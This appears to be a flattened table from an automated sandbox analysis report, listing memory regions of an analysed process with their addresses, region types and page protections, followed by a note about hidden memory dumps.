unkown
|
page read and write
|
||
3050000
|
unkown
|
page read and write
|
||
2EA000
|
stack
|
page read and write
|
||
2F7E000
|
stack
|
page read and write
|
||
2330000
|
heap private
|
page read and write
|
||
3C0000
|
heap default
|
page read and write
|
||
1C0000
|
heap private
|
page read and write
|
||
28C0000
|
unkown
|
page read and write
|
||
2A0000
|
heap private
|
page read and write
|
||
140000
|
unkown
|
page execute and read and write
|
||
258C000
|
unkown
|
page read and write
|
||
46F000
|
unkown
|
page read and write
|
||
507000
|
heap default
|
page read and write
|
||
2490000
|
unkown
|
page readonly
|
||
23E0000
|
heap private
|
page read and write
|
||
2460000
|
unkown
|
page readonly
|
||
930000
|
unkown
|
page readonly
|
||
248E000
|
stack
|
page read and write
|
||
3DE000
|
heap default
|
page read and write
|
||
170000
|
unkown
|
page readonly
|
||
434000
|
heap private
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
587000
|
heap default
|
page read and write
|
||
31DD000
|
unkown
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
540000
|
unkown
|
page readonly
|
||
280000
|
unkown
|
page read and write
|
||
25A000
|
stack
|
page read and write
|
||
1D032000
|
unkown
|
page read and write
|
||
28EF000
|
stack
|
page read and write
|
||
306A000
|
unkown
|
page read and write
|
||
38D000
|
heap default
|
page read and write
|
||
2F0000
|
unkown
|
page read and write
|
||
E6000
|
unkown
|
page read and write
|
||
A20000
|
heap default
|
page read and write
|
||
5B8000
|
heap private
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
24E0000
|
unkown
|
page read and write
|
||
1EC000
|
stack
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
464000
|
unkown image
|
page read and write
|
||
577000
|
heap default
|
page read and write
|
||
2470000
|
heap private
|
page read and write
|
||
170000
|
unkown
|
page execute and read and write
|
||
2CBE000
|
unkown
|
page read and write | page guard
|
||
1E30000
|
unkown
|
page readonly
|
||
30C000
|
heap default
|
page read and write
|
||
1EC0000
|
unkown
|
page read and write
|
||
2137000
|
unkown
|
page readonly
|
||
3080000
|
unkown
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
2730000
|
unkown
|
page read and write
|
||
269F000
|
unkown
|
page read and write
|
||
1CB9E000
|
unkown
|
page read and write
|
||
90000
|
unkown
|
page read and write
|
||
21A0000
|
unkown
|
page read and write
|
There are 1313 hidden memdumps, click here to show them.